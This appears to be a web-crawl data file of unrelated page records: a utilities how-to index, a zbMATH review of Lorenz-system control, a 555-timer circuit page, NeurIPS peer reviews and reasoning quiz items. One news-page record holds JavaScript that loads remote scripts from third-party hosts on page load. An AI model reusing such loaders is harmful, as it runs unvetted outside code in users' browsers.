{"ft_lang_label":"__label__en","ft_lang_prob":0.8320014,"math_prob":0.9566801,"size":8784,"snap":"2021-43-2021-49","text_gpt3_token_len":1819,"char_repetition_ratio":0.26617312,"word_repetition_ratio":0.4261745,"special_character_ratio":0.19000456,"punctuation_ratio":0.042976268,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98210806,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T20:27:03Z\",\"WARC-Record-ID\":\"<urn:uuid:7921fa19-05f5-45c9-a09b-e5a3c6cb0173>\",\"Content-Length\":\"17009\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0cb1bfa-653f-42cd-80d5-44d85d5b6fd7>\",\"WARC-Concurrent-To\":\"<urn:uuid:8791110c-ce79-4393-8a8f-8208195b4e1e>\",\"WARC-IP-Address\":\"104.21.71.35\",\"WARC-Target-URI\":\"https://optiekmarcbrabanders.be/Mar-21/668.html\",\"WARC-Payload-Digest\":\"sha1:XIZOBFDPADI2MM7S72TR3EIPAZ47SIZC\",\"WARC-Block-Digest\":\"sha1:HDOZYXOAOZ7HX7UROT52KPN6GS6YD7EP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588242.22_warc_CC-MAIN-20211027181907-20211027211907-00515.warc.gz\"}"}
https://eng.kakprosto.ru/kommunalnye-uslugi?page=3
[ "Utilities\n• How to remove readings from a three-phase meter\n• How to calculate the cost of water\n• How to make water in a private house\n• How to fill out a receipt of payment for electricity\n• Where to call if there is no electricity\n• Where to send readings of water meter\n• How to refuse a radio receiving station in Moscow\n• How to install garbage bins in the yard in accordance with the regulations\n• Any gas meter it is better to install\n• How to reprogram a key from the intercom\n• How to apply for benefits utilities\n• Where to call if turned off the hot water\n• If the electricity shelf life\n• Where to go if there is no water\n• How to calculate the rent\n• How to hold water on the land\n• How not to pay for gas at the counter\n• How to pay utility bills\n• How to save gas\n• Do I have to put water meters\n• How to charge for cold water\n• What is the multitariff meter\n• How to choose gas meter\n• How to calculate utilities\n• How to take readings with a mercury 200\n• How to call an electrician\n• What documents are needed for connecting electricity to non-residential plot\n• How to calculate the tariff for hot water\n• How to turn off the radio\n• How to get free electricity", null, "" ]
[ null, "https://tms.dmp.wi-fi.ru/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8908961,"math_prob":0.7743178,"size":1181,"snap":"2021-31-2021-39","text_gpt3_token_len":284,"char_repetition_ratio":0.23194562,"word_repetition_ratio":0.029166667,"special_character_ratio":0.23539373,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9537971,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T01:26:12Z\",\"WARC-Record-ID\":\"<urn:uuid:6f681556-651c-4dca-80ff-16b82462a0ea>\",\"Content-Length\":\"72319\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a22d3373-dd26-41a5-a19f-4b676bfc9be6>\",\"WARC-Concurrent-To\":\"<urn:uuid:7c3c549d-bf17-4e63-9977-8c1e0d711fe3>\",\"WARC-IP-Address\":\"178.154.246.3\",\"WARC-Target-URI\":\"https://eng.kakprosto.ru/kommunalnye-uslugi?page=3\",\"WARC-Payload-Digest\":\"sha1:ATB5NFUKWGUWC5COLKKZX4DN7JYC3LJE\",\"WARC-Block-Digest\":\"sha1:RBJSAGMINWVZFQTNAHUMODHLDA3L6KCX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154127.53_warc_CC-MAIN-20210731234924-20210801024924-00684.warc.gz\"}"}
https://www.jpost.com/middle-east/baghdad-2-car-bombs-explode-as-rice-straw-leave
[ "(function (a, d, o, r, i, c, u, p, w, m) { m = d.getElementsByTagName(o), a[c] = a[c] || {}, a[c].trigger = a[c].trigger || function () { (a[c].trigger.arg = a[c].trigger.arg || []).push(arguments)}, a[c].on = a[c].on || function () {(a[c].on.arg = a[c].on.arg || []).push(arguments)}, a[c].off = a[c].off || function () {(a[c].off.arg = a[c].off.arg || []).push(arguments) }, w = d.createElement(o), w.id = i, w.src = r, w.async = 1, w.setAttribute(p, u), m.parentNode.insertBefore(w, m), w = null} )(window, document, \"script\", \"https://95662602.adoric-om.com/adoric.js\", \"Adoric_Script\", \"adoric\",\"9cc40a7455aa779b8031bd738f77ccf1\", \"data-key\");\nvar domain=window.location.hostname; var params_totm = \"\"; (new URLSearchParams(window.location.search)).forEach(function(value, key) {if (key.startsWith('totm')) { params_totm = params_totm +\"&\"+key.replace('totm','')+\"=\"+value}}); var rand=Math.floor(10*Math.random()); var script=document.createElement(\"script\"); script.src=`https://stag-core.tfla.xyz/pre_onetag?pub_id=34&domain=\\${domain}&rand=\\${rand}&min_ugl=0\\${params_totm}`; document.head.append(script);" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9678098,"math_prob":0.96919554,"size":802,"snap":"2023-14-2023-23","text_gpt3_token_len":164,"char_repetition_ratio":0.0802005,"word_repetition_ratio":0.0,"special_character_ratio":0.18952619,"punctuation_ratio":0.10067114,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9789482,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-01T22:26:49Z\",\"WARC-Record-ID\":\"<urn:uuid:255bdca9-a5e9-4f84-b9df-c710aa0a7841>\",\"Content-Length\":\"78653\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db676f7d-2d37-4a38-9061-ee0da09e24fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:c0ff80d5-b04c-4371-8b70-1e2e83aa45dc>\",\"WARC-IP-Address\":\"159.60.130.79\",\"WARC-Target-URI\":\"https://www.jpost.com/middle-east/baghdad-2-car-bombs-explode-as-rice-straw-leave\",\"WARC-Payload-Digest\":\"sha1:UXQWPVXRYHEP2VKPESIJ56PCRMI2TUC4\",\"WARC-Block-Digest\":\"sha1:CZT3KAZK2E7P53PEQFU5W7VNBOG2VGR2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224648209.30_warc_CC-MAIN-20230601211701-20230602001701-00387.warc.gz\"}"}
https://zbmath.org/?q=an:0747.93071
[ "# zbMATH — the first resource for mathematics\n\nControl of a chaotic system. (English) Zbl 0747.93071\nGiven a Lorenz system subject to control $\\dot x_ 1=-sx_ 1+sx_ 2, \\dot x_ 2=rx_ 1-x_ 2-x_ 1 x_ 3+u, \\dot x_ 3=x_ 1 x_ 2- bx_ 3,$ the authors suggest two different controllers to stabilize unstable equilibrium point of the uncontrolled system. They analyze a particular case $$s=10$$, $$r=28$$, $$b=8/3$$, which has three unstable equilibrium points.\nThe first controller is given by $$u=-k(x_ 1-x_{10})$$. Then a sufficiently large $$k>0$$ guarantees the stability, but the motion may contain chaotic transients of different time lengths depending on the magnitude of $$k$$.\nIn the second case, the controllability minimum principle produces a stabilizing bang-bang control $$u=-10\\text{ sgn}(x^ 2_ 1-(8/3)x_ 3)$$.\nReviewer: J.Kucera (Pullman)\n\n##### MSC:\n 93D15 Stabilization of systems by feedback 93C10 Nonlinear systems in control theory 93C15 Control/observation systems governed by ordinary differential equations\nFull Text:\n##### References:\n J. Brindley and I. M. Motoz, ”Lorenz attractor behavior in a continuously stratified baroclinic fluid,”Phys. Lett., vol. 77A, pp. 441–444, 1980. P. Ehrhard and U. Müller, ”Dynamical behavior of natural convection in a single-phase loop,”J. Fluid Mech. (in press). J.E. Gayek and T.L. Vincent, ”On the asymptotic stability of boundary trajectories,”Int. J. Control, vol. 41, pp. 1077–1086, 1985. · Zbl 0562.93078 J.D. Gibbon and M.J. McGuinness, ”A derivation of the Lorenz equation for some unstable dispersive physical systems,”Phys. Lett., vol. 77A, pp 295–299, 1980. W.J. Grantham and T.L. Vincent, ”A controllability minimum principle.”J. Optimization Theory Applications, vol. 17, pp. 93–114, 1975. · Zbl 0292.93002 H. Haken, ”Analogy between higher instabilities in fluids and lasers,”Phys. Lett., vol. 53A, pp. 77–78, 1975. J.L. Kaplan and J.A. Yorke, ”Preturbulence: a regime observed in a fluid flow model of Lorenz,”Commun. Math. Phys., vol. 67, pp. 93–108, 1979. · Zbl 0443.76059 E. Knobloch, ”Chaos in a segmented disc dynamo,”Phys Lett., vol. 82A, pp. 439–440, 1981. E.N. Lorenz, ”Deterministic non-periodic flow,”J. Atmos. Sci., vol. 20, pp. 130–141, 1963. · Zbl 1417.37129 M.V.R. Malkus, ”Non-peroidic convection at high and low Prandtl number,”Mémoires Société Royale des Sciences de Liége, Series 6, vol. 4, pp. 125–128, 1972. J. Pedlosky, ”Limit cycles and unstable baroclinic waves,”J. Atmos. Sci., vol. 29, p. 53, 1972. J. Pedlosky and C. Frenzen, ”Chaotic and periodic behavior of finite amplitude baroclinic waves,”J. Atmos. Sci., vol. 37, pp. 1177–1196, 1980. C. Sparrow, ”The Lorenz equations: bifurcations, chaos, and strange attractor,”Appl. Math. Sci., vol. 41, 1982. · Zbl 0504.58001 E.D. Yorke and J.A. Yorke, ”Metastable chaos: transition to sustained chaotic behavior in the Lorenz model,”J. Stat. Phys., vol. 21, pp. 263–277, 1979.\nThis reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69030535,"math_prob":0.93608135,"size":3617,"snap":"2021-43-2021-49","text_gpt3_token_len":1180,"char_repetition_ratio":0.109880984,"word_repetition_ratio":0.00754717,"special_character_ratio":0.34089023,"punctuation_ratio":0.27272728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9891615,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-06T00:01:44Z\",\"WARC-Record-ID\":\"<urn:uuid:4ec19106-8c83-488f-ace0-81963d31267e>\",\"Content-Length\":\"52840\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:974a4d0f-5220-4c44-9910-1b6cb74e3cf5>\",\"WARC-Concurrent-To\":\"<urn:uuid:eb6be642-6d14-49a5-a33d-eb41ac113076>\",\"WARC-IP-Address\":\"141.66.194.2\",\"WARC-Target-URI\":\"https://zbmath.org/?q=an:0747.93071\",\"WARC-Payload-Digest\":\"sha1:GKS7LAOBHY225RTMUU2GYDBS3OKVP2Y5\",\"WARC-Block-Digest\":\"sha1:NHAIEGQ3MKON22UUWAQUVNIZMFOJ5O5T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363226.68_warc_CC-MAIN-20211205221915-20211206011915-00487.warc.gz\"}"}
http://www.next.gr/circuits/Circuit-diagram-for-generating-time-delay-with-555-IC-l43623.html
[ "# Circuit diagram for generating time delay with 555 IC\n\nPosted on Feb 6, 2014\n\nThis circuit based project demonstrates the working of 555 timer in astable mode to generate pulses of time period 0. 5 second. This pulse can be further used for anything where we need a pulse such as to blink a LED or to create fashionable blinking lights. Image below shows internal circuitry of NE 555 timer which can be used in astable and monos\n\ntable mode: This circuit of this project makes the use of timer IC NE555 which produces a constant square pulse of a desired frequency. This pulse could be either triggered or could be produced continuously depending upon the mode of 555 we are using. The two mostly used modes of 555 are Monostable and Astable. Here it is used in the astable mode with time period of half second, with high time period of 0. 333 seconds and low time period of 0. 166 seconds. For astable mode total time period is [ln2C*(R1+2*R2)] with high time period as [ln2(R1+R2)*C]and low time period as [ln2(R2*C)]. Here R1 is the resistor connected between VCC and pin7 (discharge pin), R2 is between pin7 and pin2 (trigger pin) and C1 is the capacitor connected from pin2 to ground. For 555 to function in astable mode pin2 and pin6 (threshold) pin must be shorted. Reset pin is connected to VCC. The output of 555 is taken at pin3 which is in the form of square wave and is then fed to lighting circuit which glows when output is high and stops when it becomes low; there by producing pattern of blinking lights. By varying the value of R1, R2 and C1 square waves of different time periods can be obtained.\n\nLeave Comment", null, "characters left:\n\n• ## New Circuits\n\n.\n\nPopular Circuits\n\n12KV High Voltage Generator\nBCD seven sections of nixie tubes reveal the decoder circuit\nXENON STROBE\nMultiple Capacitor Charger\n\nTop", null, "" ]
[ null, "http://www.next.gr/templates/nova/img/no-avatar.png", null, "http://www.next.gr/circuits/cron.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.948904,"math_prob":0.96680653,"size":3963,"snap":"2022-27-2022-33","text_gpt3_token_len":861,"char_repetition_ratio":0.10659257,"word_repetition_ratio":0.0,"special_character_ratio":0.22104466,"punctuation_ratio":0.113065325,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9587237,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-19T04:35:05Z\",\"WARC-Record-ID\":\"<urn:uuid:6ee03255-dc89-4c8c-921e-ad58d494c7e7>\",\"Content-Length\":\"83376\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:75b7c799-81cf-4da8-a2a1-e348247206bc>\",\"WARC-Concurrent-To\":\"<urn:uuid:89e20e75-af44-4ad7-8ab3-b546da095331>\",\"WARC-IP-Address\":\"198.211.126.132\",\"WARC-Target-URI\":\"http://www.next.gr/circuits/Circuit-diagram-for-generating-time-delay-with-555-IC-l43623.html\",\"WARC-Payload-Digest\":\"sha1:7RXHHDSB2XP6IZZQ7UBD6XIBW5E4DKTB\",\"WARC-Block-Digest\":\"sha1:ZSI2RNAZ7USXUDQMYSIXK4Y2JUIQXNI3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573623.4_warc_CC-MAIN-20220819035957-20220819065957-00628.warc.gz\"}"}
https://answers.everydaycalculation.com/subtract-fractions/3-5-minus-1-9
[ "# Answers\n\nSolutions by everydaycalculation.com\n\n## Subtract 1/9 from 3/5\n\n3/5 - 1/9 is 22/45.\n\n#### Steps for subtracting fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 5 and 9 is 45\n2. For the 1st fraction, since 5 × 9 = 45,\n3/5 = 3 × 9/5 × 9 = 27/45\n3. Likewise, for the 2nd fraction, since 9 × 5 = 45,\n1/9 = 1 × 5/9 × 5 = 5/45\n4. Subtract the two fractions:\n27/45 - 5/45 = 27 - 5/45 = 22/45\n\n#### Subtract Fractions Calculator\n\n-\n\nUse fraction calculator with our all-in-one calculator app: Download for Android, Download for iOS\n\n© everydaycalculation.com" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60439813,"math_prob":0.995307,"size":325,"snap":"2019-13-2019-22","text_gpt3_token_len":172,"char_repetition_ratio":0.25856698,"word_repetition_ratio":0.0,"special_character_ratio":0.5538462,"punctuation_ratio":0.06185567,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995129,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-25T15:58:21Z\",\"WARC-Record-ID\":\"<urn:uuid:91a45a51-b982-4e15-8081-6c9a1de385a8>\",\"Content-Length\":\"8452\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:12ba3528-06c7-45db-b4a4-024868250615>\",\"WARC-Concurrent-To\":\"<urn:uuid:e1f10c8b-146f-4dd7-841e-b71698a2b45c>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/subtract-fractions/3-5-minus-1-9\",\"WARC-Payload-Digest\":\"sha1:ARZEQ3HBFNOLZEW253HHPQH2Y7ZZKTEE\",\"WARC-Block-Digest\":\"sha1:S2QFPMUWMOTYHBGJVG6EAGXXF6XT2VE4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232258120.87_warc_CC-MAIN-20190525144906-20190525170906-00228.warc.gz\"}"}
https://papers.nips.cc/paper_files/paper/2020/file/4607f7fff0dce694258e1c637512aa9d-Review.html
[ "NeurIPS 2020\n\n### Review 1\n\nSummary and Contributions: This paper studies active learning with label and comparison queries, extending the works of (Kane et al, 2017, Xu et al, 2017). It gives a new set of fundamental upper and lower bounds on halfspace learning in passive/active, label/label+comparison queries, PAC/RPU(Reliably Probably Useful) models, summarized in Tables 1 and 2 in the paper. - On the lower bound side, it shows that any label-only active learning algorithm must have polynomial query complexity in PAC learning setting, and exponential sample complexity in the RPU learning setting. The main techniques are using existing combinatorial geometry results. - On the upper bound side, it shows that under mild distributional assumptions, label+comparison based active learning algorithms can have logarithmic query complexity in both PAC and RPU learning settings. The main technique is by developing a distribution-dependent variant of inference dimension (Kane et al, 2017) and a novel online-to-batch conversion (Thm 4.11).\n\nStrengths: Overall, I think it is a solid paper that greatly advances the understanding of RPU learning and learning with comparison queries. Specifically: - The development of distribution-dependent inference dimension is an important contribution, which can helps spur more works in distribution-dependent analysis of machine learning (similar to Hanneke's disagreement coefficient / Alexander's capacity function for active and passive learning) - The proof of Theorem 4.10 (distribution-dependent inference dimension for halfspaces) is not trivial, in my understanding. I was initially thinking if some arguments therein can be simplified by using (normalized) VC inequalities, but it does not lead to g(n) = 2^{-Omega(n^1+\\alpha)} for some positive alpha, which is crucial for obtaining the results in this paper.\n\nWeaknesses: - Many of the lower bounds seem to be direct applications of existing results of combinatorial geometry (although the tightness of these results are also discussed, and they nicely extend the early negative results of Kivinen on RPU learning)\n\nCorrectness: They are correct as far as I have checked, although there are a few subtle points that I need the authors' clarification.\n\nClarity: While I can understand the statements in this paper, I think the presentation can be much improved. For example: - As RPU learning implies PAC learning, is there really a need to present Algorithm 1 and Theorem 3.5? Aren't we already happy with Theorem 4.11? - in Algorithm 1, Threshold(S) is only informally defined, and an elaboration is needed. I think basically, the algorithm can successfully approximately recover b if it can find two neighboring + and - examples? - In the proof of Proposition 4.2, no high-level idea of the proof was given, which makes it a bit hard to follow (although I agree that it is correct) - In the second half of Corollary 4.7, is the goal only to identify the labels of all examples S drawn? Also, what is the active learning algorithm used here? I am also confused about the statement that \"the boosting algorithm in KLMZ is reliable even when when given the wrong inference dimension as input\". Are you referring the algorithm in page 16 of that paper (arxiv version)? - In Theorem 4.9, is H here H_{d, \\eta}? - In the proof of Theorem 4.10, what is h \\times [-\\gamma, \\gamma]? Is it {x: h(x) \\in [-\\gamma, \\gamma]}? - At the end of the proof of Theorem 4.10, it is said that \"\\forall h there must exists x, s.t. Q(S_h' - {x}) infers x.\" Would it be still possible that there exist two hypotheses h_1, h_2 that have _very small minimal-ratio_, and they agree with the queries in Q(S_h' - {x}), but disagree on x? - In Algorithm 2, if g is a constant function, can be just replace it with a constant? To align with the terminology of KLMZ as much as possible, I suggest changing the name \"average inference dimension\" to e.g.. \"inference dimension tail bound\". I think people usually use \"dimension\" to denote values that take integers.\n\nRelation to Prior Work: Yes. It also discusses a subsequent paper that benefits from the techniques in this paper.\n\nReproducibility: Yes\n\nAdditional Feedback: I thank the authors for the reply. My opinion has not changed. But I have follow-up questions that I hope the authors can clarify in the final version: 1. In the second half of Corollary 4.7, in the active RPU learning algorithm, do we need to first compute the value of k that minimizes the right hand side of the equation, then apply KLMZ's algorithm with that value of k? It might be interesting to extend KLMZ's algorithm and analysis to achieve adaptivity to the data-dependent inference dimension. 2. In Theorem 4.10, it would be very helpful to point out that what the inference algorithm used here is (it is still not clear to me if the inference algorithm needs to know the minimal-ratio or not - specifically, in the linear program alluded in page 16 of KLMZ, in combination with Claim 4.10 therein, it seems like the knowledge of minimal-ratio is needed). The algorithm right below Theorem 4.11 should be revised accordingly to incorporate this.\n\n### Review 2\n\nSummary and Contributions: This paper studies the power of comparisons in the problem of actively learning (non-homogenous) linear classifiers. There are three main results in the paper: 1) in the PAC learning model, neither active learning nor comparison queries alone provide a significant speed-up over passive learning; 2) in the PUR-learning model, the paper confirms that passive learning with label queries is intractable information-theoretically, and active learning alone provides little improvement; 3) in the PUR-learning model, the comparison oracle provides a significant improvement in both active and passive learning scenarios. In the context of previous work, the techniques of this paper are heavily based on a combination of the inference dimension (Kane, Lovett, Moran, and Zhang ) and the (non-efficient version of) margin-based active learning (Balcan and Long ). The paper also extends the analysis to the s-concave distribution based on a concentration result in Balcan and Zhang .\n\nStrengths: 1. Learning of linear classifiers with both comparison and label oracles were rarely studied in the literature; to the best of my knowledge, existing work includes Kane, Lovett, Moran, and Zhang and Xu, Zhang, Miller, Singh, and Dubrawski , but many fundamental questions remain open in the community. Using existing techniques, this paper answers many of these questions. 2. The techniques are novel for the NeurIPS standard. The theoretical analysis seem solid. Experiments are available as a theoretical paper.\n\nWeaknesses: The paper does not consider computational efficiency and noise tolerance (given that the paper is built upon , which is a computationally-inefficient algorithm), while the techniques of achieving computational efficiency and noise tolerance in the existing work of active learning are available.\n\nCorrectness: The claims and method are correct to me.\n\nClarity: The paper is well-written and easy to understand.\n\nRelation to Prior Work: The paper did a good job on discussing how this work differs from previous contributions.\n\nReproducibility: Yes\n\nAdditional Feedback: ==========after rebuttal========== I have read the rebuttal, and I am happy to recommend acceptance of this paper.\n\n### Review 3\n\nSummary and Contributions: I have reviewed this paper before, the following is an adaptation of my past review. This paper considers the problem of learning non-homogenous linear classifiers using comparison queries over distributions that are weakly concentrated (such as s-concave). The main focus of the paper is on the power of comparison queries for distribution-dependent and Reliable and Probably Useful learning. Comparison queries in addition to the labels reveal which of two instances are closer to the boundary of the classifier. Comparison queries were shown to be useful for improving the query complexity of a learning task. Kane et al.’17 considered distribution-independent setting and showed that under assumptions, such as large margin assumption, comparison queries gain an exponential improvement in query complexity over (label) active learning. The same paper also showed that in some cases, query complexity won’t have an asymptotic improvement over passive or active learning, based on a definition of a notion of “inference dimension”. An example of this is learning halfspaces in a distribution independent setting even in R^3. This paper first shows that learning non-homogenous halfspaces over uniform distribution active or passive-comparison learning individually requires poly(1/eps) queries. Similarly, in the RPU setting passive or active learning individually require (1/eps)^O(d) and comparison passive learning requires (1/eps) and comparison pool based only uses (d polylog(1/eps)).\n\nStrengths: Overall, I like the results of the paper and I think studying comparison and label active learning learning for distribution-dependent settings is very valuable. I also like that the paper studies RPU setting, where the algorithm has know what it’s uncertain about. Here, as mentioned above you need the power of comparison queries to get to d polylog(1/eps) as opposed to 1/eps^d. This model is not as well studied in modern literature, but it’s an important learning model when it comes to robustness learning.\n\nWeaknesses: Don't see a particular weakness.\n\nCorrectness: Seems correct.\n\nClarity: Good\n\nRelation to Prior Work: Yes.\n\nReproducibility: Yes\n\n### Review 4\n\nSummary and Contributions: This paper investigates several scenarios in active learning. Namely, both PAC learning and RPU learning are considered for the model; both pool-based and membership query-based settings are considered for the active learning paradigm; and, both labeling and comparisons are considered for the queries. Several new lower bounds and upper bounds are obtained for the query complexity in those scenarios. Remarkably, it is shown that for comparison queries, a query complexity polynomial in log(1/epsilon) is obtained for both the PAC setting and the RPU setting, under relatively weak assumptions for the distributions. Synthetic experiments are performed for corroborating such results.\n\nStrengths: This is a well-written, well-positioned, and well-motivated paper, with new nontrivial results in active learning. Although the proof for the upper-bound in the PAC setting (Theorem 3.3) is inspired from , the upper bound in the RPU setting (Theorems 3.7 & 3.8) relies on advanced techniques in high-dimensional geometry (notably the concept of average inference dimension). In essence, this is a very good theoretical contribution.\n\nWeaknesses: I found no real weaknesses.\n\nCorrectness: I am not an expert in high-dimensional geometry, and techniques related to the interesting concept of inference dimension. Yet, as far as I could check, the proofs look correct.\n\nClarity: As mentioned above, this paper is very well-written: all notations and definitions are clearly presented, and Section 4 is particularly useful for understanding the main concepts and tools used in the proofs.\n\nRelation to Prior Work: To the best of my knowledge, the paper is well-positioned with respect to related work, and clearly explains the main improvements obtained for different scenarios.\n\nReproducibility: Yes\n\nAdditional Feedback: As a minor comment, I would suggest to mention some perspectives of further research, such as active learning with comparison queries in agnostic settings. But a detailed conclusion is already provided in the extended version of the paper." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93040013,"math_prob":0.6792118,"size":11654,"snap":"2023-40-2023-50","text_gpt3_token_len":2452,"char_repetition_ratio":0.14291845,"word_repetition_ratio":0.0150417825,"special_character_ratio":0.20447914,"punctuation_ratio":0.117036335,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96916175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-30T23:26:05Z\",\"WARC-Record-ID\":\"<urn:uuid:44fcd532-8763-413f-8da4-f38499713deb>\",\"Content-Length\":\"14373\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:837590ea-e71a-43b9-b05c-d8f74ad55cdd>\",\"WARC-Concurrent-To\":\"<urn:uuid:620b48b8-fbb9-4093-8126-9c6503e5cf90>\",\"WARC-IP-Address\":\"198.202.70.94\",\"WARC-Target-URI\":\"https://papers.nips.cc/paper_files/paper/2020/file/4607f7fff0dce694258e1c637512aa9d-Review.html\",\"WARC-Payload-Digest\":\"sha1:FDPBNEIBN7GZEOLSGKZR3W7XIEPSOWX7\",\"WARC-Block-Digest\":\"sha1:QDPESNZFCQA3CSR4WI3VUWZ657KEOVGU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510730.6_warc_CC-MAIN-20230930213821-20231001003821-00576.warc.gz\"}"}
http://prepare.freshersindia.in/reasoning/questions_answersb215.php?tid=15&typeid=2
[ "Non-Verbal Reasoning - SERIES\n\nYou Are Here :: Home > Non-Verbal > SERIES - General Questions\n\n1.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n2.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n3.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n4.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n5.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n6.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n1\n\n2\n\n3\n\n4\n\n5\n\n6\n\n7\n\n8\n\n9\n\nnext »" ]
[ null, "http://prepare.freshersindia.in/reasoning/images/s1q.png", null, "http://prepare.freshersindia.in/reasoning/images/s2q.png", null, "http://prepare.freshersindia.in/reasoning/images/s3q.png", null, "http://prepare.freshersindia.in/reasoning/images/s4q.png", null, "http://prepare.freshersindia.in/reasoning/images/s5q.png", null, "http://prepare.freshersindia.in/reasoning/images/s6q.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93592566,"math_prob":0.5162896,"size":933,"snap":"2023-40-2023-50","text_gpt3_token_len":207,"char_repetition_ratio":0.14854683,"word_repetition_ratio":0.6826347,"special_character_ratio":0.24008575,"punctuation_ratio":0.082840234,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9834852,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-04T17:13:45Z\",\"WARC-Record-ID\":\"<urn:uuid:cd9529f3-effa-4f1e-b689-d0afb0d1c8c4>\",\"Content-Length\":\"31168\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58139973-7d1f-4282-8699-b04f9c6ecf1e>\",\"WARC-Concurrent-To\":\"<urn:uuid:08a05b57-03c8-42b8-bf20-c902c50db99b>\",\"WARC-IP-Address\":\"51.15.58.31\",\"WARC-Target-URI\":\"http://prepare.freshersindia.in/reasoning/questions_answersb215.php?tid=15&typeid=2\",\"WARC-Payload-Digest\":\"sha1:Q4UJ7X32UW7GEWZRPLICDDG5CUYD5J5S\",\"WARC-Block-Digest\":\"sha1:V5TMRQPB42PDFB5QHUOVBIPOPI4EG7BU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100531.77_warc_CC-MAIN-20231204151108-20231204181108-00568.warc.gz\"}"}
https://www.doubtnut.com/question-answer-physics/a-mass-is-suspended-separately-by-two-springs-of-spring-constants-k1-and-k2-in-successive-order-the--15600026
